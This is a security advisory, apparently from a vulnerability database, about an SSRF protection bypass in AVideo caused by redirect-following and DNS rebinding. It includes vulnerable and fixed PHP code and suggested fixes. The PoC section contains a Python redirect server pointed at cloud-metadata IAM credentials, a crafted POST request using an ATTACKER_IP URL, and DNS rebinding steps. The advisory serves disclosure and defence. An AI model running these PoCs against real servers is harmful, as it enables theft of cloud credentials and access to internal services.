Server-side request forgery (SSRF) In wwbn/avideo

Description

AVideo has SSRF Protection Bypass via HTTP Redirect and DNS Rebinding in isSSRFSafeURL()

Summary

Two endpoints in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the initial URL, the redirect target bypasses all SSRF protections.

A secondary finding is that 6+ callers of isSSRFSafeURL() discard the $resolvedIP out-parameter meant for DNS pinning, leaving them vulnerable to DNS rebinding TOCTOU attacks.

Severity: High — CVSS 3.1: 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Details

Finding 1: Redirect-Based SSRF Bypass

Vulnerable code — plugin/AI/receiveAsync.json.php (line ~162–165):

// SSRF Protection: Validate URL before fetching
if (!isSSRFSafeURL($imageUrl)) {
    // blocked
} else {
    $imageContent = file_get_contents($imageUrl);  // ← FOLLOWS REDIRECTS!
}

Vulnerable code — objects/EpgParser.php (line ~358–362):

if (!isSSRFSafeURL($this->url)) {
    throw new \RuntimeException('URL blocked by SSRF protection');
}
$this->content = @file_get_contents($this->url);  // ← FOLLOWS REDIRECTS!

Safe code for comparison — objects/functions.php, url_get_contents():

$opts = ['http' => ['follow_location' => 0]];  // Disable auto-redirect
$context = stream_context_create($opts);
for ($redirectCount = 0; $redirectCount <= 5; $redirectCount++) {
    $fetched = file_get_contents($currentUrl, false, $context);
    // ... parse Location header ...
    if ($redirectTarget) {
        if (!isSSRFSafeURL($redirectTarget)) {  // Re-validates EACH hop
            return false;...

Root cause: The SSRF redirect protection (follow_location=0 + manual redirect loop with per-hop isSSRFSafeURL() re-validation) was correctly implemented in url_get_contents() but NOT propagated to these two endpoints that call file_get_contents() directly. PHP's default follow_location is 1 (follow redirects).

Finding 2: DNS Rebinding TOCTOU (Multiple Callers)

isSSRFSafeURL() provides a $resolvedIP out-parameter for DNS pinning via CURLOPT_RESOLVE. Only 1 of 9 callers (plugin/LiveLinks/proxy.php) uses it. The remaining 8 callers discard it and pass the original hostname to the fetching function, which resolves DNS independently — creating a TOCTOU race window exploitable via DNS rebinding (TTL=0).

Affected callers (no DNS pinning):

    objects/aVideoEncoderReceiveImage.json.php — 4 call sites

    objects/aVideoEncoder.json.php — 1 call site

    plugin/BulkEmbed/save.json.php — 1 call site

    plugin/AI/receiveAsync.json.php — 1 call site

    objects/EpgParser.php — 1 call site

    plugin/Scheduler/Scheduler.php — 1 call site

PoC

Redirect Bypass PoC

    Attacker runs an HTTP server that returns a 302 redirect:

from http.server import HTTPServer, BaseHTTPRequestHandler

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
        self.end_headers()
...

    Attacker triggers AI image generation and intercepts the callback:

POST /plugin/AI/receiveAsync.json.php
Content-Type: application/x-www-form-urlencoded

type=image&token=VALID_TOKEN&ai_responses_id=ID&response[data][0][url]=http://ATTACKER_IP:8888/redir

    isSSRFSafeURL("http://ATTACKER_IP:8888/redir") resolves attacker IP → public → passes

    file_get_contents("http://ATTACKER_IP:8888/redir") follows 302 to http://169.254.169.254/...no SSRF re-check occurs

    Cloud metadata (including IAM credentials) is saved as a video thumbnail, retrievable by the attacker

Control test: Replace the redirect target with a legitimate public URL — isSSRFSafeURL() passes and the content is fetched normally, confirming the function works for non-malicious URLs.

DNS Rebinding PoC

    Configure a domain with TTL=0 DNS that alternates:

      First query: public IP (passes isSSRFSafeURL)

      Second query: 127.0.0.1 (reaches internal services)

    Submit http://rebind.attacker.com/image.jpg to any affected endpoint

    isSSRFSafeURL() resolves → public IP → passes (discards $resolvedIP)

    url_get_contents() / file_get_contents() resolves again → 127.0.0.1 → SSRF achieved

Impact

An authenticated attacker can force the AVideo server to make HTTP requests to arbitrary internal hosts, including:

    Cloud metadata endpoints (169.254.169.254) — exfiltrate IAM credentials, instance identity

    Internal services on localhost or private network (databases, admin panels, monitoring)

    Port scanning of the internal network using the server as a proxy

The exfiltrated data is stored as video thumbnails/images, making it retrievable through the application's public interface.

Suggested Fix

Fix 1 (Redirect bypass — immediate): Route both affected files through url_get_contents() which already handles redirects safely, or add explicit no-redirect context:

$ctx = stream_context_create(['http' => ['follow_location' => 0]]);
$imageContent = file_get_contents($imageUrl, false, $ctx);

Fix 2 (DNS rebinding — defense-in-depth): Update all callers to capture $resolvedIP and pass it to a DNS-pinning-aware fetch function using CURLOPT_RESOLVE.

Credit

Kai Aizen [email protected]

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
FLAT-0KVJ4 – Vulnerability | Fluid Attacks Database